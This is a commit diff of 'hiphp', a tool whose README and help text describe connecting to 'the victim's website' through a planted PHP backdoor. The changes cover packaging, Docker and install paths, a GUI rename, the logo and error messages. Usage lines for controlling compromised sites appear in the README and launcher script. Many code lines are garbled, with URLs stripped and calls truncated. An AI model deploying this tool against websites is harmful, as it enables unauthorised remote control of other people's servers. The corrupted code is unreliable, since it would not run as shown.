Projects STRLCPY hiphp Commits 5f4c8415
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
     1 +## 0.2.27-beta [xx-09-2022][In Progress]
     2 + - Updated some CLI Errors messages.
     3 + - Updated CLI logo.
     4 + - Bug fixes & performance improvements.
     5 +
    1 6  ## 0.2.26 [07-09-2022][Last Version]
    2 7   - Upgraded Docker files in order to be able to work from outside the container.
    3 8   - Add download option in hiphp_desktop.
    skipped 133 lines
  • ■ ■ ■ ■ ■ ■
    skipped 33 lines
    34 34   
    35 35  #START{
    36 36  FROM python:3.10
    37  - 
     37 +#FROM ubuntu
     38 +#FROM debian:jessie
    38 39   
    39 40  # start install google-chrome:
    40 41  # Adding trusting keys to apt for repositories
    skipped 2 lines
    43 44  # Adding Google Chrome to the repositories
    44 45  RUN sh -c 'echo "deb [arch=amd64] stable main" >> /etc/apt/sources.list.d/google-chrome.list'
    45 46   
    46  -# Updating apt to see and install Google Chrome
     47 +# Updating apt to see
    47 48  RUN apt-get update -y
    48 49   
    49  -# Magic happens
     50 +# install Google Chrome
    50 51  RUN apt-get install -y google-chrome-stable
    51 52   
    52 53  # Installing Unzip
    53  -RUN apt-get install -yqq unzip
     54 +#RUN apt-get install -yqq unzip
    54 55   
    55 56  # Download the Chrome Driver
    56  -RUN wget -q -O - | apt-key add -
    57  -RUN sh -c 'echo "deb [arch=amd64] stable main" >> /etc/apt/sources.list.d/google-chrome.list'
    58  -RUN apt-get update -y
    59  -RUN apt-get install -y google-chrome-stable
     57 +#RUN wget -q -O - | apt-key add -
     58 +#RUN sh -c 'echo "deb [arch=amd64] stable main" >> /etc/apt/sources.list.d/google-chrome.list'
     59 +#RUN apt-get update -y
     60 +#RUN apt-get install -y google-chrome-stable
    60 61   
    61 62  # install chromedriver
    62 63  RUN apt-get install -yqq unzip
    63 64  RUN wget -O /tmp/`curl -sS`/
    64 65  RUN unzip /tmp/ chromedriver -d /usr/local/bin/
     66 + 
     67 + 
     68 +#ENV CHROME_VERSION "google-chrome-stable"
     69 +#RUN sed -i -- 's&deb jessie-updates main&#deb jessie-updates main&g' /etc/apt/sources.list \
     70 +# && apt-get update && apt-get install wget -y
     71 +#ENV CHROME_VERSION "google-chrome-stable"
     72 +#RUN wget -q -O - | apt-key add - \
     73 +# && echo "deb stable main" >> /etc/apt/sources.list \
     74 +# && apt-get update && apt-get -qqy install ${CHROME_VERSION:-google-chrome-stable}
     75 + 
     76 + 
    65 77  # end install google-chrome.
    66 78   
    67 79  WORKDIR /wrdir
    skipped 1 lines
    69 81  COPY ./ /wrdir
    70 82  COPY ./hiphp /wrdir/hiphp
    71 83  #COPY ./hiphp-desktop/requirements.txt /wrdir/requirements-dst.txt
    72  -COPY ./hiphp-desktop /wrdir
     84 +COPY ./hiphp-desktop /wrdir/hiphp-desktop
    73 85  COPY ./requirements.txt /wrdir/requirements.txt
    74 86  #COPY ./config_file.json /wrdir/config_file.json
    75 87   
    76 88  RUN pip install --no-cache-dir --upgrade pip
    77 89  RUN pip install --no-cache-dir --upgrade -r /wrdir/requirements.txt
    78  -RUN pip install --no-cache-dir --upgrade -r /wrdir/requirements-dst.txt
     90 +RUN pip install --no-cache-dir --upgrade -r /wrdir/hiphp-desktop/requirements-dst.txt
    79 91   
    80 92  EXPOSE 8080
    81 93   
    skipped 2 lines
  • ■ ■ ■ ■ ■ ■
    skipped 129 lines
    130 130  <h2>Ubuntu Installation:</h2>
    131 131   
    132 132  ```bash
     133 +❯ git clone
     134 + 
    133 135  # Install:
    134  -❯ git clone
    135 136  ❯ pip install -r hiphp/requirements.txt
    136 137  ❯ cd hiphp/install
    137 138  ❯ bash -i
    skipped 8 lines
    146 147  ❯ hiphp --help # hiphp cli help.
    147 148  ❯ hiphp --geth [KEY] [URL] # Get the hole Code.
    148 149  ❯ hiphp [KEY] [URL] # Connect to the victim's website.
    149  -❯ hiphp --ftp [KEY] [URL] # Run hiphp as GUI with 'tools/hiphp_ftp' script.
    150  -❯ hiphp --dst # Run hiphp as GUI with 'tools/hiphp_desktop' script.
     150 +❯ hiphp --tk [KEY] [URL] # Run hiphp as GUI with 'hiphp-tk' script.
     151 +❯ hiphp --dst # Run hiphp as GUI with 'hiphp-desktop'.
    151 152   
    152 153  # Uninstall:
    153 154  ❯ cd hiphp/install
    skipped 18 lines
    172 173  <h2>Run with hiphp-desktop:</h2>
    173 174   
    174 175  ```bash
    175  -# Run with hiphp_desktop tool:
     176 +# Run with hiphp-desktop tool:
    176 177  ❯ git clone
     178 +❯ cd hiphp
    177 179  ❯ pip install -r requirements.txt
    178  -❯ cd hiphp
    179  -❯ cp -r "hiphp" "hiphp-desktop/"
    180  -❯ cd hiphp-desktop/
     180 +❯ cd hiphp-desktop
    181 181  ❯ pip install -r requirements-dst.txt
    182 182  ❯ python3
     183 + 
     184 +# Or if you install it on Ubuntu:
     185 +❯ hiphp --dst
    183 186  ```
    184 187   
    185  -<h2>Run with hiphp_ftp:</h2>
     188 +<h2>Run with hiphp-tk:</h2>
    186 189   
    187 190  ```bash
    188  -# run with hiphp_ftp tool:
     191 +# run with hiphp-tk tool:
    189 192  ❯ git clone
    190 193  ❯ cd hiphp
    191  -❯ cp -r "hiphp" "tools/hiphp_ftp/"
    192  -❯ cd tools/hiphp_ftp/
    193 194  ❯ pip install -r requirements.txt
     195 +❯ cd hiphp-tk
     196 +❯ pip install -r requirements-tk.txt
    194 197  ❯ python3 <KEY> <URL>
     198 + 
     199 +# Or if you install it on Ubuntu:
     200 +❯ hiphp --tk <KEY> <URL>
    195 201  ```
    196 202   
    197 203  <h2>Script Usage:</h2>
    skipped 149 lines
    347 353   <a href="">
    348 354   <img height="100" src="" alt="hiphp by yasserbdj96">
    349 355   </a>
    350  - <a href="">
    351  - <img height="100" src="" alt="hiphp by yasserbdj96">
     356 + <a href="">
     357 + <img height="100" src="" alt="hiphp by yasserbdj96">
    352 358   </a>
    353 359   <a href="">
    354 360   <img height="100" src="" alt="hiphp by yasserbdj96">
    skipped 9 lines
    364 370  <h2>Changelog History:</h2>
    365 371   
    366 372  ```
     373 +## 0.2.27-beta [xx-09-2022][In Progress]
     374 + - Updated some CLI Errors messages.
     375 + - Updated CLI logo.
     376 + - Bug fixes & performance improvements.
     377 + 
    367 378  ## 0.2.26 [07-09-2022][Last Version]
    368 379   - Upgraded Docker files in order to be able to work from outside the container.
    369 380   - Add download option in hiphp_desktop.
    skipped 157 lines
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    skipped 11 lines
    12 12  # | |
    13 13  
    14 14  #START{
     15 +from hiphp.hiphpversion import __version__
    15 16  from hiphp.hiphpcoding import rot13,tobase64,tomd5
    16 17  from hiphp.hiphpphpfunctions import *
    17 18  from hiphp.hiphphelp import help
    skipped 1 lines
    19 20  from hiphp.hiphplicense import license
    20 21  from hiphp.hiphpabout import about
    21 22  from hiphp.hiphplogo import *
    22  -from hiphp.hiphpversion import __version__
    23 23  #from ashar import *
    24 24  from hexor import *
    25 25  #from asciitext import *
    skipped 64 lines
    90 90   #
    91 91   key_w_color=self.color.c(self.key,self.c_red)
    92 92   url_w_color=self.color.c(self.url_w,self.c_yellow)
    93  - at=self.color.c("|",self.c_white_red)
    94  - print(logox+xxr1+key_w_color+at+url_w_color+xxr2+getcwd+xxr3)
     93 + at=self.color.c("||",self.c_blue)
     94 + print(logox+"\n"+xxr1+key_w_color+at+url_w_color+xxr2+getcwd+xxr3)
    95 95  
    96 96   #try:
    97 97   command=input(xxr4)
    skipped 4 lines
    102 102   if command[0:6].lower()=="--help" or command[0:4].lower()=="help":
    103 103   help_c=command.split(" ")
    104 104   try:
    105  - help(help_c[1])
     105 + help(__version__,help_c[1])
    106 106   except:
    107  - print(help())
     107 + print(help(__version__))
    108 108   #exit
    109 109   elif command[0:6].lower()=="--exit" or command[0:4].lower()=="exit":
    110 110   exit()
    skipped 44 lines
    155 155   print(,zip_file_name,out_path))
    156 156  
    157 157   except:
    158  - help("--down")
     158 + help(__version__,"--down")
    159 159   #zip
    160 160   elif command[0:5].lower()=="--zip" or command[0:3].lower()=="zip":
    161 161   ziping=command.split(" ")
    skipped 91 lines
    253 253   #rf
    254 254   elif command[0:4].lower()=="--rf" or command[0:2].lower()=="rf":
    255 255   varss=command.split(" ")
    256  -
    257 256   if varss[len(varss)-1]=="":
    258 257   del varss[len(varss)-1]
    259 258   print(hiphp.run_file(self,varss[1],varss[2:]))
    skipped 12 lines
    272 271   else:
    273 272   hiphp.upload(self,command.split(" ")[1])
    274 273   else:
    275  -,self.key,self.url,self.headers,False,command)
     274 +,self.key,self.url,self.headers,True,command)
     275 + if comand_return!="":
     276 + print(comand_return)
     277 + else:
     278 + self.color2.c(errx+" "+command+emsg_6,self.c_red)
    276 279   else:
    277 280   self.color2.c(emsg_2,self.c_red)
    278 281   hiphp.cli(self)
    skipped 133 lines
  • ■ ■ ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13   
    14 14  #START{
    15  -def help(opt=""):
     15 +def help(__version__,opt=""):
    16 16   #
    17 17   spsbar=""""""
    18 18   
    19 19   #
    20  - header="""hiphp Commands :
    21  -════════════════
     20 + header=f"""hiphp V{__version__} - (C) 2010-2022 yasserbdj96
     21 +
     22 + 
    22 23   Command Description
    23 24   ------- -----------"""
    24 25   
    skipped 101 lines
  • ■ ■ ■ ■ ■ ■
    skipped 12 lines
    13 13   
    14 14  #START{
    15 15  from hexor import *
     16 +from biglibrary import *
    16 17   
    17 18  # logo:
    18 19  def logo(__version__):
    skipped 2 lines
    21 22   c_blue="#4285f4"#blue
    22 23   c_yellow="#fbbc05"#yellow
    23 24   c_green="#34a853"#green
     25 + c_white="#f7f7f7"
    24 26   
    25 27   color=hexor(True,"hex")
     28 + bl=biglibrary(returning=True)
     29 + logox="\n"
     30 + logox+=color.c(" ▄███████▄ ▄█ █▄ ▄███████▄"),c_red)
     31 + logox+="\n"
     32 + logox+=color.c(" ███ ███ ███ ███ ███ ███"),c_red)
     33 + logox+="\n"
     34 + logox+=color.c("╦ ╦ ███ ███ ███ ███ ███ ███"),c_red)
     35 + logox+="\n"
     36 + logox+=color.c("║ ║ ═╦═ ▀█████████▀ ▀▀███▀▀▀▀███▀ ▀█████████▀ "),c_red)
     37 + logox+="\n"
     38 + logox+=color.c("╠═══╣ ║ ███ ███ ███ ███ "),c_red)
     39 + logox+="\n"
     40 + logox+=color.c("║ ║ ║ ███ ███ ███ ███ "),c_red)
     41 + logox+="\n"
     42 + logox+=color.c("╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ "),c_red)
     43 + logox+="\n"
     44 + logox+=color.c("+------------------------------------------------------+"),c_red)
     45 + logox+="\n"
     46 + logox+=color.c("hiphp v{__version__} by yasserbdj96"),c_green)
     47 + logox+="\n"
     48 + logox+=color.c(""),c_blue)
     49 + logox+="\n"
     50 + logox+=color.c("+------------------------------------------------------+"),c_red)
     51 + logox+="\n"
     52 + logox+=color.c("\n [!] '--help' for more informations.\n",c_yellow)
     53 + logox+=color.c(" [!] '--exit' OR 'Ctrl+C' for exit.\n",c_yellow)
     54 + #logox+="\n"
    26 55   
    27  - spas=" "*5
    28  - code_by=color.c("¢σ∂є∂ ву ",c_yellow)+color.c("yasserbdj96",c_green)
    29  - logo+=color.c(f"""
    30  -{spas} ▄███████▄ ▄█ █▄ ▄███████▄
    31  -{spas} ███ ███ ███ ███ ███ ███
    32  -{spas}╦ ╦ ███ ███ ███ ███ ███ ███
    33  -{spas}║ ║ ═╦═ ▀█████████▀ ▀▀███▀▀▀▀███▀ ▀█████████▀
    34  -{spas}╠═══╣ ║ ███ ███ ███ ███
    35  -{spas}║ ║ ║ ███ V{__version__} ███ ███ ███
    36  -{spas}╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ {code_by}\n""",c_red)
    37  - logo+=color.c(" "*17+"\n",c_blue)
    38  - #logo+=self.color.c(" "*37+"Code by -> ",self.c_yellow)+self.color.c("yasserbdj96\n",self.c_green)
    39  - #logo+=self.color.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.\n",self.c_blue)
    40  - logo+=color.c("\n - '--help' for more informations.\n",c_yellow)
    41  - logo+=color.c(" - '--exit' OR 'Ctrl+C' for exit.\n\n",c_yellow)
    42  - return logo
     56 + return logox
    43 57  #
    44 58  try:
    45 59   import sys
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13   
    14 14  #START{
    15  -emsg_1="[✗] We were unable to recognize the hiphp identifier."
    16  -emsg_2="[✗] Command not found!"
    17  -emsg_3="[✗] We could not contact the site"
    18  -emsg_4="[✗] The file you entered does not exist."
    19  -emsg_5="[✗] We could not upload the file"
     15 +errx="[✗]"
     16 +emsg_1=f"{errx} We were unable to recognize the hiphp identifier."
     17 +emsg_2=f"{errx} Command not found!"
     18 +emsg_3=f"{errx} We could not contact the site"
     19 +emsg_4=f"{errx} The file you entered does not exist."
     20 +emsg_5=f"{errx} We could not upload the file"
     21 +emsg_6=": Command does not exist or ended with a server error."
    20 22   
    21  -msg_1="[!] Copy the PHP code below to the website path you entered:"
    22  -msg_2="[!] There is a new update "
    23  -msg_3="[!] Download the new version from ''"
    24  -msg_4="[!] No updates available"
     23 +msgi="[!]"
     24 +msg_1=f"{msgi} Copy the PHP code below to the website path you entered:"
     25 +msg_2=f"{msgi} There is a new update "
     26 +msg_3=f"{msgi} Download the new version from ''"
     27 +msg_4=f"{msgi} No updates available"
    25 28   
    26  -smsg_1="[✓] File downloaded in: "
    27  -smsg_2="[✓] The path has been compressed into: "
     29 +msgs="[✓]"
     30 +smsg_1=f"{msgs} File downloaded in: "
     31 +smsg_2=f"{msgs} The path has been compressed into: "
    28 32  #}END.
  • ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13   
    14 14  #START{
    15  -__version__="0.2.26"
     15 +__version__="0.2.27"
    16 16  #}END.
  • ■ ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13   
    14 14  #START{
     15 +import sys
     16 +import os
     17 + 
     18 +try:
     19 + sys.path.insert(0,f'..{os.sep}hiphp')
     20 + from hiphp import *
     21 + from hiphp.hiphpversion import __version__
     22 +except:
     23 + sys.path.insert(0, '..')
     24 + from hiphp import *
     25 + from hiphp.hiphpversion import __version__
     26 + 
    15 27  import eel
    16  -from hiphp import *
    17  -from hiphp.hiphpversion import __version__
    18 28  from src.php import *
    19  -import os
     29 + 
    20 30   
    21 31   
    22 32  hiphp_desktop_version="0.2.0"
    skipped 80 lines
  • hiphp-desktop/screenshot/screenshot.png
  • hiphp-desktop/screenshot/screenshot1.png
  • hiphp-desktop/screenshot/screenshot2.png
  • hiphp-desktop/src/hiphp_logo.png
  • hiphp-site/logo_small.png
  • hiphp-tk/favicon.png
  • ■ ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13  
    14 14  #START{
     15 +import sys
    15 16  import os
     17 +
     18 +try:
     19 + sys.path.insert(0,f'..{os.sep}hiphp')
     20 + from hiphp import *
     21 + from hiphp.hiphpversion import __version__
     22 +except:
     23 + sys.path.insert(0, '..')
     24 + from hiphp import *
     25 + from hiphp.hiphpversion import __version__
     26 +
    16 27  from hiphp import *
    17 28  from hiphp.hiphpversion import __version__
    18 29  from tkinter import *
    skipped 111 lines
    130 141   Reconnect()
    131 142  
    132 143  root=Tk()
    133  -root.title('hiphp FTP')
     144 +root.title('hiphp TK')
    134 145  try:
    135 146   try:
    136 147   photo = PhotoImage(file = "./favicon.png")
    skipped 80 lines
    217 228  c1=Checkbutton(root,text='multiple selection',variable=var1,onvalue=1,offvalue=0,command=selectmode)
    218 229  c1.pack(side="top")
    219 230  
    220  -w=Label(root,text=f"hiphp V{__version__} ftp V{ftp_version}")
     231 +w=Label(root,text=f"hiphp V{__version__} tk V{ftp_version}")
    221 232  w.pack()
    222 233,rely=1.0,anchor='se')
    223 234  
    skipped 3 lines
  • hiphp-tk/screenshot/screenshot.png
  • ■ ■ ■ ■ ■
    1 1  1.0.8
    2  - 
  • install/hiphp.png
  • ■ ■ ■ ■ ■ ■
    skipped 18 lines
    19 19   echo "ex: hiphp --help | # hiphp cli help.";
    20 20   echo " hiphp --geth [KEY] [URL] | # Get the hole Code.";
    21 21   echo " hiphp [KEY] [URL] | # Connect to the victim's website.";
    22  - echo " hiphp --ftp [KEY] [URL] | # Run hiphp as GUI with 'tools/hiphp_ftp' script.";
    23  - echo " hiphp --dst | # Run hiphp as GUI with 'tools/hiphp_desktop' script.";
     22 + echo " hiphp --tk [KEY] [URL] | # Run hiphp as GUI with 'hiphp-tk' script.";
     23 + echo " hiphp --dst | # Run hiphp as GUI with 'hiphp-desktop'.";
    24 24   
    25 25  #cli help:
    26 26  elif [ "$1" == "--help" ] ; then
    27 27   python3 "/usr/share/hiphp/" "--help";
    28 28   
    29  -#hiphp_ftp:
    30  -elif [ "$1" == "--ftp" ] ; then
    31  - python3 "/usr/share/hiphp/" "$2" "$3";
     29 +#hiphp_tk:
     30 +elif [ "$1" == "--tk" ] ; then
     31 + python3 "/usr/share/hiphp/hiphp-tk/" "$2" "$3";
    32 32   
    33 33  #hiphp_desktop:
    34 34  elif [ "$1" == "--dst" ] ; then
    35  - python3 "/usr/share/hiphp/";
     35 + python3 "/usr/share/hiphp/hiphp-desktop/";
    36 36   
    37 37  #cli:
    38 38  else
    skipped 4 lines
    43 43   fi
    44 44  fi
    45 45  #}END.
     46 + 
  • ■ ■ ■ ■ ■ ■
    skipped 21 lines
    22 22   sudo cp "$appname.png" "/usr/share/$appname/$appname.png";
    23 23   sudo cp "$appname.desktop" "/usr/share/applications/$appname.desktop";
    24 24   sudo cp "$" "/usr/local/bin/$appname";
     25 + #sudo cp -r "../src/." "/usr/share/$appname/src";
    25 26   
    26  - # install hiphp_ftp script:
    27  - sudo cp "../tools/hiphp_ftp/" "/usr/share/$appname/";
    28  - sudo cp "../tools/hiphp_ftp/favicon.png" "/usr/share/$appname/favicon.png";
    29  - pip install -r "../tools/hiphp_ftp/requirements.txt";
     27 + # install hiphp-tk script:
     28 + #sudo cp "../hiphp-tk/" "/usr/share/$appname/";
     29 + #sudo cp "../hiphp-tk/favicon.png" "/usr/share/$appname/favicon.png";
     30 + sudo cp -r "../hiphp-tk/." "/usr/share/$appname/hiphp-tk";
     31 + pip install -r "../hiphp-tk/requirements-tk.txt";
    30 32   
    31 33   # install hiphp-desktop script:
    32  - sudo cp "../hiphp-desktop/" "/usr/share/$appname/";
    33  - sudo cp -r "../hiphp-desktop/src/." "/usr/share/$appname/src";
     34 + #sudo cp "../hiphp-desktop/" "/usr/share/$appname/";
     35 + sudo cp -r "../hiphp-desktop/." "/usr/share/$appname/hiphp-desktop";
    34 36   pip install -r "../hiphp-desktop/requirements-dst.txt";
    35 37  }
    36 38   
    skipped 27 lines
  • ■ ■ ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13   
    14 14  #START{
    15  -from hiphp import *
    16  - 
    17  - 
     15 +import sys
     16 +import os
    18 17   
    19 18  try:
    20 19   docker_check=False
    21 20   #
    22  - import os
    23  - import sys
    24  - #
    25 21   try:
    26 22   DST=os.environ['DST'] if "DST" in os.environ else False
    27 23   if DST!=False:
     24 + os.chdir("hiphp-desktop")
    28 25   os.system("python")
    29 26   docker_check=True
    30 27   except:
    skipped 7 lines
    38 35   print(f"USAGE : python3 {sys.argv[0]} <KEY> <URL>")
    39 36   exit()
    40 37   #pass
     38 + 
     39 +try:
     40 + sys.path.insert(0,f'.{os.sep}hiphp')
     41 + from hiphp import *
     42 + from hiphp.hiphpversion import __version__
     43 +except:
     44 + sys.path.insert(0, '.')
     45 + from hiphp import *
     46 + from hiphp.hiphpversion import __version__
    41 47   
    42 48  # connect:
    43 49  p1=hiphp(key=KEY,url=URL)#Default: retu=False.
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